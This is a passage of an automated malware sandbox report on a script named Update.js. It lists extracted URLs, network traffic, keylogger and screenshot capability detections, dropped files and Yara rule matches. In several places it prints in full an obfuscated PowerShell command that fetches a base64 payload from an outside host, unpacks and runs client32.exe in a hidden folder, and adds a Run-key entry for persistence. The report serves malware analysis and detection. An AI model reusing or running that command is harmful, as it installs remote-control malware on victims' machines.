Source: powershell.exe, 00000008.00000002.1567156116.0000026C0139F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00229000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com
Source: wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/
Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/0X
Source: wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/s
Source: wscript.exe, 00000000.00000003.1487288378.000001FC55788000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/trade/da
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/trade/da.php?9800
Source: wscript.exe, 00000000.00000003.1369359764.000001FC5575A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1389692516.000001FC555C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244089717.000001FC54A57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/trade/fix.php?6867
Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/trade/fix.php?6867EF
Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000003.1366341815.000001FC53AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1243375949.000001FC518D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388374479.000001FC55692000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255625344.000001FC51AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355050587.000001FC57D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: wscript.exe, 00000000.00000003.1253318916.000001FC539D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.htmlX
Source: wscript.exe, 00000000.00000003.1416060813.000001FC5443D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.htmlXVNT
Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255625344.000001FC51AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js String found in binary or memory: https://www.googleapis.com
Source: wscript.exe, 00000000.00000003.1388374479.000001FC55692000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.comp
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown HTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49707 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard, 10_2_1101FC20
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110335A0 GetClipboardFormatNameA,SetClipboardData, 10_2_110335A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard, 10_2_1101FC20
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock, 10_2_11033320
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor, 10_2_110077A0
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState, 10_2_11114590
Yara detected Keylogger Generic
Source: Yara match File source: 10.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: client32.exe PID: 4108, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA, 10_2_111165C0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7024.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: sslproxydump.pcap, type: PCAP Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: wscript.exe PID: 7024, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll Jump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; Jump to behavior
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Process Stats: CPU usage > 24%
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11113190: GetKeyState,DeviceIoControl,keybd_event, 10_2_11113190
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec, 10_2_1115EA00
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102D9F4
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102DD21
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA14EE 8_2_00007FFECBFA14EE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA2500 8_2_00007FFECBFA2500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA2212 8_2_00007FFECBFA2212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFAAAD3 8_2_00007FFECBFAAAD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA172F 8_2_00007FFECBFA172F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECC4B704A 8_2_00007FFECC4B704A
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11073680 10_2_11073680
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11029BB0 10_2_11029BB0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110627B0 10_2_110627B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110336D0 10_2_110336D0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11051800 10_2_11051800
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1115F840 10_2_1115F840
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102BD40 10_2_1102BD40
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1101BCD0 10_2_1101BCD0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11087F50 10_2_11087F50
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11045E70 10_2_11045E70
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1101C110 10_2_1101C110
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111640E0 10_2_111640E0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11168345 10_2_11168345
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111265B0 10_2_111265B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11070430 10_2_11070430
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11080740 10_2_11080740
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1100892B 10_2_1100892B
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1101CF30 10_2_1101CF30
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1116EE8B 10_2_1116EE8B
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA8A980 10_2_6CA8A980
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
Enables security privileges
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Process token adjusted: Security Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11161299 appears 41 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11027F40 appears 47 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11164ED0 appears 32 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11147060 appears 594 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 1105E820 appears 293 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 6CA97D00 appears 32 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11081E70 appears 46 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11029A70 appears 1003 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 1116FED0 appears 37 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Update.js Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi64_7024.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: sslproxydump.pcap, type: PCAP Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: wscript.exe PID: 7024, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.rans.troj.expl.evad.winJS@6/28@2/3
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1105A760 GetLastError,FormatMessageA,LocalFree, 10_2_1105A760
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges, 10_2_1109D860
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1109D8F0 AdjustTokenPrivileges,CloseHandle, 10_2_1109D8F0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize, 10_2_11116880
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11089430 FindResourceA,LoadResource,LockResource, 10_2_11089430
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 10_2_11128B10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3 Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_febnwrhp.qfn.ps1 Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
